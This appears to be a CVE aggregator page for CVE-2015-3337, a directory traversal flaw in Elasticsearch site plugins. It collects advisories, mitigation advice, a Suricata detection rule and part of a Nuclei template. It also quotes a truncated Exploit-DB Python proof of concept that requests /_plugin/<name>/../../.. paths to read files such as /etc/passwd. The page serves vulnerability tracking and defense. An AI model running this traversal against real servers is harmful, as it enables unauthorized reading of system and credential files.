CVE-2015-3337
published 2015-05-01CVE-2015-3337: Directory traversal vulnerability in Elasticsearch before 1.4.5 and 1.5.x before 1.5.2, when a site plugin is enabled, allows remote attackers to read…
PriorityP346medium4.3CVSS 2.0
AVNACMAuNCPINAN
EXPLOIT
EPSS
33.13%
98.2th percentile
Directory traversal vulnerability in Elasticsearch before 1.4.5 and 1.5.x before 1.5.2, when a site plugin is enabled, allows remote attackers to read arbitrary files via unspecified vectors.
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| elasticsearch | elasticsearch | <= 1.4.4 | — |
| elasticsearch | elasticsearch | — | — |
| elasticsearch | elasticsearch | — | — |
Detection & IOCsextracted from sources · hover to see the quote
- ·Non-site plugins (Shield, Licensing, Cloud-AWS, Cloud-GCE, Cloud-Azure, analysis plugins, river plugins) do not expose the vulnerability ↗
- ·Setting http.disable_sites=true in elasticsearch.yml mitigates the traversal but disables all site plugin functionality ↗
CVSS provenance
nvdv2.04.3MEDIUMAV:N/AC:M/Au:N/C:P/I:N/A:N
vendor_redhat4.3MEDIUM
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
OSV
Improper Limitation of a Pathname to a Restricted Directory in Elasticsearch
osv·2022-05-17
CVE-2015-3337 [MEDIUM] Improper Limitation of a Pathname to a Restricted Directory in Elasticsearch
Improper Limitation of a Pathname to a Restricted Directory in Elasticsearch
Directory traversal vulnerability in Elasticsearch before 1.4.5 and 1.5.x before 1.5.2, when a site plugin is enabled, allows remote attackers to read arbitrary files via unspecified vectors.
GHSA
Improper Limitation of a Pathname to a Restricted Directory in Elasticsearch
ghsa·2022-05-17
CVE-2015-3337 [MEDIUM] CWE-22 Improper Limitation of a Pathname to a Restricted Directory in Elasticsearch
Improper Limitation of a Pathname to a Restricted Directory in Elasticsearch
Directory traversal vulnerability in Elasticsearch before 1.4.5 and 1.5.x before 1.5.2, when a site plugin is enabled, allows remote attackers to read arbitrary files via unspecified vectors.
Red Hat
elasticsearch: directory traversal flaw
vendor_redhat·2015-04-24·CVSS 4.3
CVE-2015-3337 [MEDIUM] CWE-22 elasticsearch: directory traversal flaw
elasticsearch: directory traversal flaw
Directory traversal vulnerability in Elasticsearch before 1.4.5 and 1.5.x before 1.5.2, when a site plugin is enabled, allows remote attackers to read arbitrary files via unspecified vectors.
Statement: This issue affects the versions of elasticsearch as shipped with Red Hat Satellite 6.x and Subscription Asset Manager 1.x. Red Hat Product Security has rated this issue as having Low security impact. A future update may address this issue. For additional information, refer to the Issue Severity Classification: https://access.redhat.com/security/updates/classification/.
Mitigation: Users that do not want to upgrade can address the vulnerability in several ways, but these options will break any site plugin:
* Set http.disable_sites to true in the ela
Suricata
ET WEB_SERVER ElasticSearch Directory Traversal Attempt (CVE-2015-3337)
suricata·2015-05-22·CVSS 4.3
CVE-2015-3337 [MEDIUM] ET WEB_SERVER ElasticSearch Directory Traversal Attempt (CVE-2015-3337)
ET WEB_SERVER ElasticSearch Directory Traversal Attempt (CVE-2015-3337)
Rule: alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"ET WEB_SERVER ElasticSearch Directory Traversal Attempt (CVE-2015-3337)"; flow:established,to_server; http.uri.raw; content:"/_plugin/"; fast_pattern; pcre:"/(?:%2(?:52e(?:%2(?:52e(?:%(?:(?:25)?2|c0%a)f|\/)|e(?:%(?:(?:25)?2|c0%a)f|\/))|\.(?:%(?:(?:25)?2|c0%a)f|\/))|e(?:%2(?:52e(?:%(?:(?:25)?2|c0%a)f|\/)|e(?:%(?:(?:25)?2|c0%a)f|\/))|\.(?:%(?:(?:25)?2|c0%a)f|\/)))|\.(?:%2(?:52e(?:%(?:(?:25)?2|c0%a)f|\/)|e(?:%(?:(?:25)?2|c0%a)f|\/))|\.(?:%(?:(?:25)?2|c0%a)f|\/)))/Ri"; reference:cve,2015-3337; classtype:web-application-attack; sid:2021138; rev:7; metadata:created_at 2015_05_22, cve CVE_2015_3337, deployment Perimeter, deployment Internal, confidence High, signature
Exploit-DB
ElasticSearch < 1.4.5 / < 1.5.2 - Directory Traversal
exploitdb·2015-05-18·CVSS 4.3
CVE-2015-3337 [MEDIUM] ElasticSearch < 1.4.5 / < 1.5.2 - Directory Traversal
ElasticSearch 3:
print "Ex: %s www.example.com /etc/passwd" % sys.argv[0]
sys.exit()
port = 9200 # Default ES http port
host = sys.argv[1]
fpath = sys.argv[2]
def grab(plugin):
socket.setdefaulttimeout(3)
s = socket.socket()
s.connect((host,port))
s.send("GET /_plugin/%s/../../../../../..%s HTTP/1.0\n"
"Host: %s\n\n" % (plugin, fpath, host))
file = s.recv(2048)
print " [*] Trying to retrieve %s:" % fpath
if ("HTTP/1.0 200 OK" in file):
print "\n%s" % file
else:
print "[-] File Not Found, No Access Rights or System Not Vulnerable"
def pfind(plugin):
try:
socket.setdefaulttimeout(3)
s = socket.socket()
s.connect((host,port))
s.send("GET /_plugin/%s/ HTTP/1.0\n"
"Host: %s\n\n" % (plugin, host))
file = s.recv(16)
print "[*] Trying to find plugin %s:" % plugin
if ("HTTP/1.0 200 OK" in file):
Nuclei
Elasticsearch - Local File Inclusion
nuclei·CVSS 4.3
CVE-2015-3337 [MEDIUM] Elasticsearch - Local File Inclusion
Elasticsearch - Local File Inclusion
Elasticsearch before 1.4.5 and 1.5.x before 1.5.2 allows remote attackers to read arbitrary files via unspecified vectors when a site plugin is enabled.
Template:
id: CVE-2015-3337
info:
name: Elasticsearch - Local File Inclusion
author: pdteam
severity: medium
description: Elasticsearch before 1.4.5 and 1.5.x before 1.5.2 allows remote attackers to read arbitrary files via unspecified vectors when a site plugin is enabled.
impact: |
An attacker can exploit this vulnerability to read sensitive files on the server.
remediation: |
Upgrade to a patched version of Elasticsearch or apply the necessary security patches.
reference:
- https://www.exploit-db.com/exploits/37054/
- https://www.elastic.co/community/security
- http://www.debian.org/security/2015
http://packetstormsecurity.com/files/131646/Elasticsearch-Directory-Traversal.htmlhttp://www.debian.org/security/2015/dsa-3241http://www.securityfocus.com/archive/1/535385http://www.securityfocus.com/bid/74353https://www.elastic.co/community/securityhttps://www.exploit-db.com/exploits/37054/http://packetstormsecurity.com/files/131646/Elasticsearch-Directory-Traversal.htmlhttp://www.debian.org/security/2015/dsa-3241http://www.securityfocus.com/archive/1/535385http://www.securityfocus.com/bid/74353https://www.elastic.co/community/securityhttps://www.exploit-db.com/exploits/37054/
2015-05-01
Published